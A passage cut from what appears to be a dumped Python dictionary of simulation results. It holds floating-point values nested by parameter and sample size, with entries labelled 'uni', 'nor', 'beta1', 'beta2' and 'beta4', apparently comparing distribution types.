0.22864723992828329, 'nor': 0.25517195260709286, 'beta1': 0.2223328847363084, 'beta2': 0.2733216821263156, 'beta4': 0.20304334588696407}, 50: {'uni': 0.27905130659334465, 'nor': 0.29278280274240853, 'beta1': 0.27019362750168496, 'beta2': 0.31309475544534465, 'beta4': 0.2559990955320065}, 30: {'uni': 0.3425789585849717, 'nor': 0.37265663059965937, 'beta1': 0.3464581721664352, 'beta2': 0.3754015070826656, 'beta4': 
0.33959173277428956}, 20: {'uni': 0.413086515337455, 'nor': 0.43965945028509446, 'beta1': 0.418736079933717, 'beta2': 0.4501591234804877, 'beta4': 0.4084124782048353}, 10: {'uni': 0.5706418060679364, 'nor': 0.6001645167142622, 'beta1': 0.583725351797004, 'beta2': 0.6040594457979085, 'beta4': 0.5764634218983131}}, 100: {1000: {'uni': 0.06313216417743228, 'nor': 0.15511920982718863, 'beta1': 0.06071848963460641, 'beta2': 0.1852927465697436, 'beta4': 0.046839153362001285}, 750: {'uni': 0.07060453599906669, 'nor': 0.15967621914568836, 'beta1': 0.07229601201250235, 'beta2': 0.182858927441081, 'beta4': 0.055455267837987376}, 500: {'uni': 0.08818052394211406, 'nor': 0.16873532933540125, 'beta1': 0.0868958489599253, 'beta2': 0.1975968138053138, 'beta4': 0.06905730331083232}, 400: {'uni': 0.09814516465678552, 'nor': 0.1712550619838623, 'beta1': 0.09386098643015672, 'beta2': 0.20350183151319534, 'beta4': 0.0760007184942118}, 300: {'uni': 0.11258064110576615, 'nor': 0.1861127284054659, 'beta1': 0.11092868379936521, 'beta2': 0.20785761241672152, 'beta4': 0.09103330358097073}, 200: {'uni': 0.1420062149021436, 'nor': 0.2039189542914086, 'beta1': 0.13490696398941743, 'beta2': 0.21950847474619883, 'beta4': 0.11479778662604484}, 150: {'uni': 0.15523966003490114, 'nor': 0.21793931900467456, 'beta1': 0.15561530770905507, 'beta2': 0.2357875854144415, 'beta4': 0.13546635253677153}, 100: {'uni': 0.19239990647813998, 'nor': 0.2438993981647118, 'beta1': 0.1922366330056719, 'beta2': 0.2604761303669994, 'beta4': 0.1659451762115397}, 75: {'uni': 0.22461916118542863, 'nor': 0.27058774539802555, 'beta1': 0.22230160922578357, 'beta2': 0.2911017312827485, 'beta4': 0.19346309234954379}, 50: {'uni': 0.27074554119725264, 'nor': 0.30742771165485183, 'beta1': 0.27244230243937856, 'beta2': 0.32070239362920566, 'beta4': 0.24948280857988892}, 30: {'uni': 0.35244357964247014, 'nor': 0.36981016362792096, 'beta1': 0.34898633566867193, 'beta2': 0.38698154490065484, 'beta4': 0.3248812590836839}, 20: {'uni': 
0.4240679624088838, 'nor': 0.45938820409137887, 'beta1': 0.43245353617429105, 'beta2': 0.44501946591388836, 'beta4': 0.40725305375468834}, 10: {'uni': 0.5815683982350479, 'nor': 0.5902866349338, 'beta1': 0.5747202522025672, 'beta2': 0.6059676751094598, 'beta4': 0.5690438100022845}}, 75: {1000: {'uni': 0.06343097776077222, 'nor': 0.18225818491306756, 'beta1': 0.06089929840604752, 'beta2': 0.1921539386252139, 'beta4': 0.04668630013644415}, 750: {'uni': 0.07093914009247082, 'nor': 0.18331684154766742, 'beta1': 0.07107432732560648, 'beta2': 0.19880651185771303, 'beta4': 0.05348844967825772}, 500: {'uni': 0.08795472881903066, 'nor': 0.18823200655948724, 'beta1': 0.08586213142784449, 'beta2': 0.20523208991902597, 'beta4': 0.0679290798965112}, 400: {'uni': 0.09712081890314317, 'nor': 0.19232649259506907, 'beta1': 0.09572130547403512, 'beta2': 0.20602199644821684, 'beta4': 0.07606892412187635}, 300: {'uni': 0.11089260364623976, 'nor': 0.20098062324678168, 'beta1': 0.11308804326671185, 'beta2': 0.21785952031115308, 'beta4': 0.08679599809855915}, 200: {'uni': 0.13809595295884958, 'nor': 0.21558504424344116, 'beta1': 0.13648211163259177, 'beta2': 0.2240794200909899, 'beta4': 0.11204654007283227}, 150: {'uni': 0.15618647125937568, 'nor': 0.22837035534828887, 'beta1': 0.16415374893470858, 'beta2': 0.24619708299092824, 'beta4': 0.1306985642616213}, 100: {'uni': 0.19101450956719734, 'nor': 0.25931455723118757, 'beta1': 0.1906189266503715, 'beta2': 0.25867729487710983, 'beta4': 0.16519992510196357}, 75: {'uni': 0.2248743837036717, 'nor': 0.284057154634835, 'beta1': 0.2214601276761196, 'beta2': 0.2968579661443965, 'beta4': 0.19826666120956982}, 50: {'uni': 0.2662431911648192, 'nor': 0.322043709935765, 'beta1': 0.2744451907446851, 'beta2': 0.32350434821909946, 'beta4': 0.23404149031621968}, 30: {'uni': 0.3413757219051654, 'nor': 0.38244337953851876, 'beta1': 0.33835049788177923, 'beta2': 0.38719686508504525, 'beta4': 0.32727681475974785}, 20: {'uni': 0.4194033788361589, 'nor': 
0.4577741598526479, 'beta1': 0.42074777341644765, 'beta2': 0.459091804977372, 'beta4': 0.396462204973229}, 10: {'uni': 0.5907006598340476, 'nor': 0.6052762697560137, 'beta1': 0.5799457230505303, 'beta2': 0.5967731695513359, 'beta4': 0.5567664226243562}}, 50: {1000: {'uni': 0.06289662081877767, 'nor': 0.21209732127933695, 'beta1': 0.06328219460040524, 'beta2': 0.21952990496616331, 'beta4': 0.04652359653778593}, 750: {'uni': 0.07302743229171516, 'nor': 0.214754896945754, 'beta1': 0.07193093639114312, 'beta2': 0.22024404018125943, 'beta4': 0.05415327509547532}, 500: {'uni': 0.08893676490117702, 'nor': 0.22572655912609974, 'beta1': 0.08580989277541334, 'beta2': 0.22230227225554544, 'beta4': 0.06673468929448162}, 400: {'uni': 0.09924243273175976, 'nor': 0.21704650146565524, 'beta1': 0.09913193004467818, 'beta2': 0.2230390821061281, 'beta4': 0.07605580382200511}, 300: {'uni': 0.11166832041438324, 'nor': 0.2316018695710197, 'beta1': 0.11095163241473041, 'beta2': 0.22865927465012947, 'beta4': 0.08685797923558519}, 200: {'uni': 0.13771685172695608, 'nor': 0.2444927799351998, 'beta1': 0.13618389281423876, 'beta2': 0.2476456752305473, 'beta4': 0.11083026707940419}, 150: {'uni': 0.16377774164329523, 'nor': 0.26636154033277937, 'beta1': 0.15952097465539494, 'beta2': 0.2642089480719845, 'beta4': 0.12746484906871963}, 100: {'uni': 0.19907093430084438, 'nor': 0.2881344316533607, 'beta1': 0.19083482136604094, 'beta2': 0.2795457182953769, 'beta4': 0.16290169574365254}, 75: {'uni': 0.22574036421615706, 'nor': 0.2945057282847927, 'beta1': 0.22099290833697738, 'beta2': 0.3125623487295235, 'beta4': 0.18773801878190854}, 50: {'uni': 0.26854352815958205, 'nor': 0.34022111278024636, 'beta1': 0.26708927188428466, 'beta2': 0.33081642137592326, 'beta4': 0.2312879966418534}, 30: {'uni': 0.34609583514062453, 'nor': 0.3974340756558435, 'beta1': 0.35262530240286505, 'beta2': 0.40184913128104555, 'beta4': 0.31424089478942174}, 20: {'uni': 0.42087262066086245, 'nor': 0.4723782826353492, 'beta1': 
0.40877860835331126, 'beta2': 0.4688509117448108, 'beta4': 0.3944964916008954}, 10: {'uni': 0.5876869576804664, 'nor': 0.6147903811081372, 'beta1': 0.5755066117906042, 'beta2': 0.6002859122286868, 'beta4': 0.5619966062890571}}, 30: {1000: {'uni': 0.06948652094585245, 'nor': 0.2718705530055696, 'beta1': 0.06121483805914607, 'beta2': 0.24043460865095967, 'beta4': 0.04627664402531112}, 750: {'uni': 0.07850498128590577, 'nor': 0.2757982454491844, 'beta1': 0.07241579137645177, 'beta2': 0.23983322004672003, 'beta4': 0.05332068388106076}, 500: {'uni': 0.09105158068430297, 'nor': 0.28241113398116124, 'beta1': 0.08799353765963347, 'beta2': 0.24766224893806577, 'beta4': 0.06765893263671346}, 400: {'uni': 0.10259273534636915, 'nor': 0.2792924843341777, 'beta1': 0.09836004244107166, 'beta2': 0.2550995041680404, 'beta4': 0.07407712496960317}, 300: {'uni': 0.11391452466229124, 'nor': 0.2807189754417535, 'beta1': 0.10984101411545055, 'beta2': 0.26044799268369856, 'beta4': 0.08443610887402886}, 200: {'uni': 0.14196809341696937, 'nor': 0.30755809164972786, 'beta1': 0.134610786707702, 'beta2': 0.2728609545630691, 'beta4': 0.10722586308476961}, 150: {'uni': 0.16419172956318423, 'nor': 0.3146162122023685, 'beta1': 0.16286335903122795, 'beta2': 0.2776012731538803, 'beta4': 0.12523292823182686}, 100: {'uni': 0.1960001100263563, 'nor': 0.33279373396299217, 'beta1': 0.19130478182156138, 'beta2': 0.3054148396914321, 'beta4': 0.14912466816038042}, 75: {'uni': 0.2185677970786405, 'nor': 0.34709466522087906, 'beta1': 0.22127741653506036, 'beta2': 0.3201758535953785, 'beta4': 0.1777525903209297}, 50: {'uni': 0.270413471015134, 'nor': 0.3892831769925561, 'beta1': 0.2761867140439328, 'beta2': 0.35340657017600746, 'beta4': 0.22674679543504245}, 30: {'uni': 0.3355166504892189, 'nor': 0.44161834679911804, 'beta1': 0.3401068225433252, 'beta2': 0.4102852253271071, 'beta4': 0.3009578630318522}, 20: {'uni': 0.4262038800117972, 'nor': 0.5086511058873824, 'beta1': 0.41934711626787075, 'beta2': 
0.4781819621838607, 'beta4': 0.3804323693448428}, 10: {'uni': 0.5575440699348245, 'nor': 0.6393871170053329, 'beta1': 0.5743956360209639, 'beta2': 0.6106643197230515, 'beta4': 0.55155845441342}}, 20: {1000: {'uni': 0.07536262505840652, 'nor': 0.325103001431867, 'beta1': 0.06343013362012273, 'beta2': 0.2629182940928082, 'beta4': 0.0460977432301721}, 750: {'uni': 0.0829470027542002, 'nor': 0.32291554964370983, 'beta1': 0.07116730251499337, 'beta2': 0.2659412807353341, 'beta4': 0.05406687577763064}, 500: {'uni': 0.09694368519188473, 'nor': 0.3349376153106337, 'beta1': 0.08654293972580873, 'beta2': 0.2723939674154165, 'beta4': 0.06538298069380022}, 400: {'uni': 0.10627426651824678, 'nor': 0.3429154491873649, 'beta1': 0.09562315388400733, 'beta2': 0.274633662575442, 'beta4': 0.07380231095120421}, 300: {'uni': 0.12121567109701081, 'nor': 0.34972582827606147, 'beta1': 0.1103611782866849, 'beta2': 0.2862428547095127, 'beta4': 0.08272204817151216}, 200: {'uni': 0.14071639130023078, 'nor': 0.35855620239382735, 'beta1': 0.13776555190056528, 'beta2': 0.29720835544613766, 'beta4': 0.10338502388302273}, 150: {'uni': 0.1674293069624112, 'nor': 0.3688691322877407, 'beta1': 0.1527138911941961, 'beta2': 0.3059024770592428, 'beta4': 0.11972445069338061}, 100: {'uni': 0.1931249598575589, 'nor': 0.3948780972148766, 'beta1': 0.19347436784743782, 'beta2': 0.3310703246707575, 'beta4': 0.15095159670353941}, 75: {'uni': 0.22271809589488334, 'nor': 0.3953558256807349, 'beta1': 0.22024905763478564, 'beta2': 0.34639607563218006, 'beta4': 0.1733242565090895}, 50: {'uni': 0.2692139861904778, 'nor': 0.44176675584445435, 'beta1': 0.2681610154192196, 'beta2': 0.3688995176021794, 'beta4': 0.2199893429283878}, 30: {'uni': 0.34613135894553704, 'nor': 0.48601158747952417, 'beta1': 0.3526353889844575, 'beta2': 0.41994055226884575, 'beta4': 0.3022745779371493}, 20: {'uni': 0.4142621100975231, 'nor': 0.5324753066803931, 'beta1': 0.42017567922341303, 'beta2': 0.4983438571041758, 'beta4': 
0.37087287301736277}, 10: {'uni': 0.5815509625778061, 'nor': 0.6599263857098001, 'beta1': 0.5848662195260658, 'beta2': 0.6277074211809401, 'beta4': 0.536410316354095}}, 10: {1000: {'uni': 0.10593932477847545, 'nor': 0.47843393031925197, 'beta1': 0.09118434879484168, 'beta2': 0.31039960784712656, 'beta4': 0.04571662748262856}, 750: {'uni': 0.10873654868800559, 'nor': 0.4828796783832185, 'beta1': 0.09123008540154381, 'beta2': 0.32058869843201154, 'beta4': 0.05459270006386302}, 500: {'uni': 0.1218524317529881, 'nor': 0.47457693822012165, 'beta1': 0.09190111833494254, 'beta2': 0.32548160013208494, 'beta4': 0.06444599187085187}, 400: {'uni': 0.1291175399330874, 'nor': 0.48422996573767696, 'beta1': 0.09770420769932464, 'beta2': 0.3207957215249058, 'beta4': 0.07182128251456826}, 300: {'uni': 0.13986394783048994, 'nor': 0.4936681503491342, 'beta1': 0.11639095276280087, 'beta2': 0.3302723438968203, 'beta4': 0.08350546988796351}, 200: {'uni': 0.15641204249228619, 'nor': 0.49091789466629215, 'beta1': 0.1384070227155504, 'beta2': 0.33428367370964873, 'beta4': 0.10341259876194087}, 150: {'uni': 0.1795234939504045, 'nor': 0.5105288108171256, 'beta1': 0.15598497704645214, 'beta2': 0.3493488175884878, 'beta4': 0.121233871216612}, 100: {'uni': 0.20239443979403965, 'nor': 0.5084179657882892, 'beta1': 0.19184385711254798, 'beta2': 0.3677119127424313, 'beta4': 0.14277278677201605}, 75: {'uni': 0.23336879708678648, 'nor': 0.5372531064368602, 'beta1': 0.21661827263964478, 'beta2': 0.38626444266491533, 'beta4': 0.1731449508683547}, 50: {'uni': 0.27958310612315557, 'nor': 0.5493723312942567, 'beta1': 0.27176323053080753, 'beta2': 0.4024758607629697, 'beta4': 0.21208860379265493}, 30: {'uni': 0.35159835409526013, 'nor': 0.6014446437219039, 'beta1': 0.3425500943598077, 'beta2': 0.4384712270988477, 'beta4': 0.27735321868152857}, 20: {'uni': 0.42536479079788436, 'nor': 0.638297428768129, 'beta1': 0.41601242728257026, 'beta2': 0.4962070327728678, 'beta4': 0.35012615099378874}, 10: {'uni': 
0.5790001552629874, 'nor': 0.7766658813569549, 'beta1': 0.5698438923280504, 'beta2': 0.6494949780401632, 'beta4': 0.5099159037878125}}}, 0.005: {1000: {1000: {'uni': 0.054309210293536636, 'nor': 0.06770710838466354, 'beta1': 0.05394964156179005, 'beta2': 0.10851637362805477, 'beta4': 0.04843440132315624}, 750: {'uni': 0.06322911372839468, 'nor': 0.0745551173670449, 'beta1': 0.06287867060893981, 'beta2': 0.11461799139150997, 'beta4': 0.05586943360634522}, 500: {'uni': 0.07765031214887835, 'nor': 0.08611027590190884, 'beta1': 0.07713692782616743, 'beta2': 0.11964611258405178, 'beta4': 0.07119677640670702}, 400: {'uni': 0.0854335124620158, 'nor': 0.09548666720165888, 'beta1': 0.08533596488740514, 'beta2': 0.12715285235100549, 'beta4': 0.07976243865103633}, 300: {'uni': 0.09989789753529099, 'nor': 0.10770019723728286, 'beta1': 0.10033186368236657, 'beta2': 0.13419229911795216, 'beta4': 0.09411115678315363}, 200: {'uni': 0.12127892617742153, 'nor': 0.12720442210497968, 'beta1': 0.12233003012147065, 'beta2': 0.15172099760163998, 'beta4': 0.11632447574237281}, 150: {'uni': 0.14013211406544834, 'nor': 0.14827174402121335, 'beta1': 0.13915131007977077, 'beta2': 0.1658270971393584, 'beta4': 0.13647642747887956}, 100: {'uni': 0.16997690980859004, 'nor': 0.17670091885771855, 'beta1': 0.16973161594489053, 'beta2': 0.19345282120387458, 'beta4': 0.1661007523523409}, 75: {'uni': 0.19932581091265966, 'nor': 0.2027740177880774, 'beta1': 0.19612208261591985, 'beta2': 0.21702643923996, 'beta4': 0.19530006216709206}, 50: {'uni': 0.2468910799274996, 'nor': 0.24339758057452598, 'beta1': 0.24033137076480987, 'beta2': 0.252320775622887, 'beta4': 0.2366355896057103}, 30: {'uni': 0.305496981057798, 'nor': 0.3093061642043575, 'beta1': 0.3019112459095068, 'beta2': 0.32031294166562413, 'beta4': 0.3061483505104996}, 20: {'uni': 0.3717287585662501, 'nor': 0.37675350444050804, 'beta1': 0.37247628349892237, 'beta2': 0.37673982805892064, 'beta4': 0.3751343167170222}, 10: {'uni': 0.521167289093317, 
'nor': 0.518263035063083, 'beta1': 0.5175638164552467, 'beta2': 0.5206573949182801, 'beta4': 0.5201760853486797}}, 750: {1000: {'uni': 0.055164667777315046, 'nor': 0.07131664732480447, 'beta1': 0.05461015638241973, 'beta2': 0.10747658269785487, 'beta4': 0.04694525214323675}, 750: {'uni': 0.06303342152086694, 'nor': 0.07763029700247803, 'beta1': 0.06322330711203825, 'beta2': 0.11262414947388338, 'beta4': 0.05532984777518732}, 500: {'uni': 0.07669845695030969, 'nor': 0.09063047612797143, 'beta1': 0.07696921230024523, 'beta2': 0.11983272103386594, 'beta4': 0.06956147386680006}, 400: {'uni': 0.08611488267094475, 'nor': 0.0974713367565152, 'beta1': 0.08478041441928014, 'beta2': 0.12731656056450652, 'beta4': 0.07991489810774749}, 300: {'uni': 0.09985154726648465, 'nor': 0.111169848481041, 'beta1': 0.09777711208026346, 'beta2': 0.13531396869038226, 'beta4': 0.09119975402687397}, 200: {'uni': 0.1211085307144601, 'nor': 0.12968999402436032, 'beta1': 0.12091197897231892, 'beta2': 0.15150314994539527, 'beta4': 0.1155329295397578}, 150: {'uni': 0.14070726556031377, 'nor': 0.14567076992622047, 'beta1': 0.13814881873714974, 'beta2': 0.16827021141072973, 'beta4': 0.13447433397080932}, 100: {'uni': 0.17147077335738992, 'nor': 0.17723697577268377, 'beta1': 0.1701072384695923, 'beta2': 0.19228744913609386, 'beta4': 0.16650131522038414}, 75: {'uni': 0.19697585503036097, 'nor': 0.2068795811630726, 'beta1': 0.19570918631380896, 'beta2': 0.21738847323087096, 'beta4': 0.19446732054460464}, 50: {'uni': 0.23830528070048534, 'nor': 0.24112746544721542, 'beta1': 0.24024370353633562, 'beta2': 0.25617890898562745, 'beta4': 0.2374860040189496}, 30: {'uni': 0.3047940690571652, 'nor': 0.3117736625777223, 'beta1': 0.3075351731550439, 'beta2': 0.3272819694873685, 'beta4': 0.3075370456855608}, 20: {'uni': 0.38162187029118155, 'nor': 0.3738685108858104, 'beta1': 0.372463189312913, 'beta2': 0.3868272294258014, 'beta4': 0.37379486160733993}, 10: {'uni': 0.5258444160016277, 'nor': 0.5215991214259363, 
'beta1': 0.517833660238219, 'beta2': 0.5255924381659314, 'beta4': 0.514420238437874}}, 500: {1000: {'uni': 0.05462849470497394, 'nor': 0.07814858053006213, 'beta1': 0.05439078035500816, 'beta2': 0.11786529274785795, 'beta4': 0.04512974256857838}, 750: {'uni': 0.0630164202653, 'nor': 0.08598140708093582, 'beta1': 0.06280717820250309, 'beta2': 0.12253896527927555, 'beta4': 0.05327711159917553}, 500: {'uni': 0.07718768079866062, 'nor': 0.09473087596860513, 'beta1': 0.07771672820740799, 'beta2': 0.13066189974731812, 'beta4': 0.06792781655042113}, 400: {'uni': 0.08727900239437064, 'nor': 0.1031046602693152, 'beta1': 0.08587201246728926, 'beta2': 0.13750278345580969, 'beta4': 0.07641943558033681}, 300: {'uni': 0.09735499483435273, 'nor': 0.11238965365776238, 'beta1': 0.10105981918034712, 'beta2': 0.1429736395904797, 'beta4': 0.09020195977248413}, 200: {'uni': 0.12317763693332873, 'nor': 0.13530119957403747, 'beta1': 0.11942019256586084, 'beta2': 0.16298780836084303, 'beta4': 0.11456409066249257}, 150: {'uni': 0.1407614431099966, 'nor': 0.15131961478693112, 'beta1': 0.14148625143732174, 'beta2': 0.17679433711198078, 'beta4': 0.13076961122199615}, 100: {'uni': 0.1713862765989115, 'nor': 0.18173933803266007, 'beta1': 0.17107023194956172, 'beta2': 0.20004435790715813, 'beta4': 0.16667447549743752}, 75: {'uni': 0.19683034656665033, 'nor': 0.20562378844499862, 'beta1': 0.20171095440300613, 'beta2': 0.2228278954167986, 'beta4': 0.18979851902028033}, 50: {'uni': 0.24134168665013422, 'nor': 0.25303094047370045, 'beta1': 0.2405937821161408, 'beta2': 0.25814476480505677, 'beta4': 0.23379201812238004}, 30: {'uni': 0.30572219759341496, 'nor': 0.3138147539731113, 'beta1': 0.31220387612792333, 'beta2': 0.32746285385932816, 'beta4': 0.3068274256947208}, 20: {'uni': 0.3766240108372487, 'nor': 0.3794127882935937, 'beta1': 0.3687031808183018, 'beta2': 0.3835817175154338, 'beta4': 0.36538004912059097}, 10: {'uni': 0.5172842691254594, 'nor': 0.5231665455873322, 'beta1': 0.5189693525633482, 
'beta2': 0.5311363287437341, 'beta4': 0.5139644087094528}}, 400: {1000: {'uni': 0.05437173202096113, 'nor': 0.08305972110203474, 'beta1': 0.054735721524527214, 'beta2': 0.11691664940089053, 'beta4': 0.044764759336513305}, 750: {'uni': 0.06296519099843445, 'nor': 0.08805615903403163, 'beta1': 0.06272026286720017, 'beta2': 0.1210806824585442, 'beta4': 0.052896515060130544}, 500: {'uni': 0.07760492127335133, 'nor': 0.0995661105004016, 'beta1': 0.07684496802411883, 'beta2': 0.12802441585532842, 'beta4': 0.06722957912133365}, 400: {'uni': 0.08525797685642766, 'nor': 0.1059372885433747, 'beta1': 0.08619988724777161, 'beta2': 0.13431886591110576, 'beta4': 0.07539217174214996}, 300: {'uni': 0.0982990668151138, 'nor': 0.11634268888448995, 'beta1': 0.09983116086197136, 'beta2': 0.14490484107113055, 'beta4': 0.08792653305842368}, 200: {'uni': 0.12203769639477358, 'nor': 0.13660314035918714, 'beta1': 0.12012838172596668, 'beta2': 0.15855457816365026, 'beta4': 0.11342497995414347}, 150: {'uni': 0.13994483228161086, 'nor': 0.15423137169373957, 'beta1': 0.14071121957348942, 'beta2': 0.1759524837742879, 'beta4': 0.12973842437014774}, 100: {'uni': 0.16998004751235896, 'nor': 0.18533997087586795, 'beta1': 0.17260069554339919, 'beta2': 0.20142524926231042, 'beta4': 0.16375622461186412}, 75: {'uni': 0.19919438048820443, 'nor': 0.20872180909907717, 'beta1': 0.19747443091888628, 'beta2': 0.22331606995046627, 'beta4': 0.18915187538619394}, 50: {'uni': 0.24260494503890717, 'nor': 0.2490837050424674, 'beta1': 0.24174431425141207, 'beta2': 0.26695113075708743, 'beta4': 0.23530080467269482}, 30: {'uni': 0.30678574020464666, 'nor': 0.3207642333511338, 'beta1': 0.30811715717135785, 'beta2': 0.3248044091864074, 'beta4': 0.3019272505018041}, 20: {'uni': 0.3754849973727803, 'nor': 0.3792312499409558, 'beta1': 0.3737894450702678, 'beta2': 0.39127103265108387, 'beta4': 0.3711738822600462}, 10: {'uni': 0.5138997823796634, 'nor': 0.5127905077842452, 'beta1': 0.5169043634953481, 'beta2': 
0.5281055333295728, 'beta4': 0.5193863606893283}}, 300: {1000: {'uni': 0.054171219309968266, 'nor': 0.09149857715201964, 'beta1': 0.054967619265905765, 'beta2': 0.12328907814221546, 'beta4': 0.04422880083376829}, 750: {'uni': 0.06228069924407087, 'nor': 0.09672249810959854, 'beta1': 0.0633028218826393, 'beta2': 0.12865131475687186, 'beta4': 0.05215982023008059}, 500: {'uni': 0.07862740955308545, 'nor': 0.10538600209851101, 'beta1': 0.07634673776224471, 'beta2': 0.13579516304274086, 'beta4': 0.06570451083138404}, 400: {'uni': 0.08606522700190578, 'nor': 0.11159352035626091, 'beta1': 0.08637179271313189, 'beta2': 0.1427193158728336, 'beta4': 0.07325637093886234}, 300: {'uni': 0.09982270055761183, 'nor': 0.122758213601175, 'beta1': 0.09973780782522945, 'beta2': 0.15198003666478777, 'beta4': 0.08630423340788074}, 200: {'uni': 0.12190239561659899, 'nor': 0.14363241010985406, 'beta1': 0.1212028739293255, 'beta2': 0.16502734817092168, 'beta4': 0.10950972011591287}, 150: {'uni': 0.1417718900803699, 'nor': 0.1593838233572799, 'beta1': 0.14050415423056511, 'beta2': 0.17994840692557712, 'beta4': 0.12734797519473529}, 100: {'uni': 0.17071272759843154, 'nor': 0.18620924221751517, 'beta1': 0.1694943482147639, 'beta2': 0.2061617674979867, 'beta4': 0.15839016146732976}, 75: {'uni': 0.19584271511298973, 'nor': 0.2093370290072297, 'beta1': 0.19718572391483902, 'beta2': 0.23127370158834348, 'beta4': 0.18832549889256817}, 50: {'uni': 0.2373732051332261, 'nor': 0.2525943440552235, 'beta1': 0.24061212793870418, 'beta2': 0.26576036413576276, 'beta4': 0.23083689372432803}, 30: {'uni': 0.3100041602252892, 'nor': 0.3259233331503591, 'beta1': 0.3043992784905107, 'beta2': 0.32847104261195337, 'beta4': 0.2976093515050148}, 20: {'uni': 0.37875813326972396, 'nor': 0.38421934320745366, 'beta1': 0.36904579022730116, 'beta2': 0.39257091754456774, 'beta4': 0.3714918858680628}, 10: {'uni': 0.5256130005835765, 'nor': 0.5146313247332729, 'beta1': 0.5154354512884594, 'beta2': 0.5236551729483561, 
'beta4': 0.5171483868755382}}, 200: {1000: {'uni': 0.054823062468771444, 'nor': 0.10237608718650248, 'beta1': 0.054913425269282445, 'beta2': 0.13753066984524742, 'beta4': 0.04306065777641055}, 750: {'uni': 0.06303781952610477, 'nor': 0.107566183991327, 'beta1': 0.06420595175095856, 'beta2': 0.14051764144651235, 'beta4': 0.05083566221768343}, 500: {'uni': 0.077773467688739, 'nor': 0.11742486043919942, 'beta1': 0.07700877908013115, 'beta2': 0.1511127593960866, 'beta4': 0.06280694981838986}, 400: {'uni': 0.08746277637091704, 'nor': 0.12365577953156803, 'beta1': 0.08541014292804638, 'beta2': 0.15608748317289656, 'beta4': 0.07176746331816469}, 300: {'uni': 0.09874368980037385, 'nor': 0.13279799940406578, 'beta1': 0.10063727053662885, 'beta2': 0.16469825347196948, 'beta4': 0.08447571374140178}, 200: {'uni': 0.12147398047991875, 'nor': 0.15113252491099077, 'beta1': 0.1200711704573576, 'beta2': 0.1773291927975813, 'beta4': 0.10795683062214101}, 150: {'uni': 0.1362385673420503, 'nor': 0.16821153015139878, 'beta1': 0.1413420271907294, 'beta2': 0.19069570391948212, 'beta4': 0.12371945303991366}, 100: {'uni': 0.17191169006549945, 'nor': 0.1915000329509956, 'beta1': 0.16877716420631123, 'beta2': 0.21536781735389232, 'beta4': 0.15634386366388436}, 75: {'uni': 0.19768216860175636, 'nor': 0.21811329268682084, 'beta1': 0.1944362202006149, 'beta2': 0.23468699165444767, 'beta4': 0.18438491874181984}, 50: {'uni': 0.24173902870459993, 'nor': 0.25892138695111544, 'beta1': 0.23935110326757852, 'beta2': 0.2736926533593288, 'beta4': 0.2305071196963152}, 30: {'uni': 0.3056290673196859, 'nor': 0.31961597063487057, 'beta1': 0.30685624740134015, 'beta2': 0.3314946124079916, 'beta4': 0.2962690398405605}, 20: {'uni': 0.37503602220656485, 'nor': 0.38582014314039126, 'beta1': 0.37033940847339836, 'beta2': 0.394855889549228, 'beta4': 0.3632513574058299}, 10: {'uni': 0.5219475742101427, 'nor': 0.5273558177210325, 'beta1': 0.5179563071106704, 'beta2': 0.5223280464261697, 'beta4': 0.508754397926185}}, 
150: {1000: {'uni': 0.05497081944724275, 'nor': 0.11293866805236763, 'beta1': 0.054515515093092715, 'beta2': 0.14887668708582957, 'beta4': 0.0423526366673494}, 750: {'uni': 0.06272727255199112, 'nor': 0.11935685094462867, 'beta1': 0.06302161535014611, 'beta2': 0.15422727456751978, 'beta4': 0.05010677582182044}, 500: {'uni': 0.07783890547759603, 'nor': 0.12892780402185094, 'beta1': 0.07679900717257704, 'beta2': 0.1584491203937134, 'beta4': 0.06222703641019131}, 400: {'uni': 0.08619692493811398, 'nor': 0.13460267386562202, 'beta1': 0.08498682818675518, 'beta2': 0.16069418726755758, 'beta4': 0.07050071410282907}, 300: {'uni': 0.0997903074389076, 'nor': 0.1434928646404363, 'beta1': 0.09987792658944261, 'beta2': 0.1712581767153427, 'beta4': 0.08388928555633074}, 200: {'uni': 0.1229636584423498, 'nor': 0.16127335693854156, 'beta1': 0.12179318587940297, 'beta2': 0.18650787549305375, 'beta4': 0.10364099823577061}, 150: {'uni': 0.13950034070955347, 'nor': 0.17459656922463157, 'beta1': 0.13855391323541408, 'beta2': 0.19837515491552643, 'beta4': 0.12275345243127289}, 100: {'uni': 0.1721101997017661, 'nor': 0.20046992755603654, 'beta1': 0.17021665164027383, 'beta2': 0.22211280446894255, 'beta4': 0.15546389829003454}, 75: {'uni': 0.1991174934620939, 'nor': 0.22331372517586023, 'beta1': 0.1962104983206956, 'beta2': 0.24060724420863722, 'beta4': 0.17937743495141684}, 50: {'uni': 0.23946193200510502, 'nor': 0.25716770411393886, 'beta1': 0.2418907692375714, 'beta2': 0.27698760128146055, 'beta4': 0.22462197378366977}, 30: {'uni': 0.3048167499504834, 'nor': 0.3224164981392731, 'beta1': 0.30917669628791133, 'beta2': 0.3397217885796864, 'beta4': 0.2951530259916931}, 20: {'uni': 0.3730336363648902, 'nor': 0.392045571478165, 'beta1': 0.37260044052109287, 'beta2': 0.3959432577708598, 'beta4': 0.36505805948899306}, 10: {'uni': 0.5205895094295567, 'nor': 0.5200665477634308, 'beta1': 0.5169539616971102, 'beta2': 0.5378667745281579, 'beta4': 0.5122123299658353}}, 100: {1000: {'uni': 
0.054671905903051154, 'nor': 0.13620477958130078, 'beta1': 0.054448380411697084, 'beta2': 0.156407609946504, 'beta4': 0.04258031568291154}, 750: {'uni': 0.06266207206914232, 'nor': 0.13888439278405296, 'beta1': 0.06271791632667584, 'beta2': 0.16566678573632287, 'beta4': 0.0482925234291825}, 500: {'uni': 0.0775012675871265, 'nor': 0.14584060351193762, 'beta1': 0.07690888604663815, 'beta2': 0.16862882144382407, 'beta4': 0.06119566013646921}, 400: {'uni': 0.08612080986238169, 'nor': 0.1524884087949958, 'beta1': 0.08594295867668089, 'beta2': 0.17546187004121272, 'beta4': 0.06890296067565604}, 300: {'uni': 0.09914477687385226, 'nor': 0.16047382364230972, 'beta1': 0.09975824624614843, 'beta2': 0.18295548537415873, 'beta4': 0.08159044925727432}, 200: {'uni': 0.12159165562809493, 'nor': 0.1749465483291479, 'beta1': 0.12382445050344149, 'beta2': 0.19490495485248804, 'beta4': 0.10001305394379784}, 150: {'uni': 0.14077933594023823, 'nor': 0.18899798332431184, 'beta1': 0.1392565038337702, 'beta2': 0.20870351777500962, 'beta4': 0.1201824703566371}, 100: {'uni': 0.17056823279090622, 'nor': 0.21428849869387473, 'beta1': 0.1691699130978257, 'beta2': 0.23043861580390712, 'beta4': 0.1516000664543985}, 75: {'uni': 0.19663636725395228, 'nor': 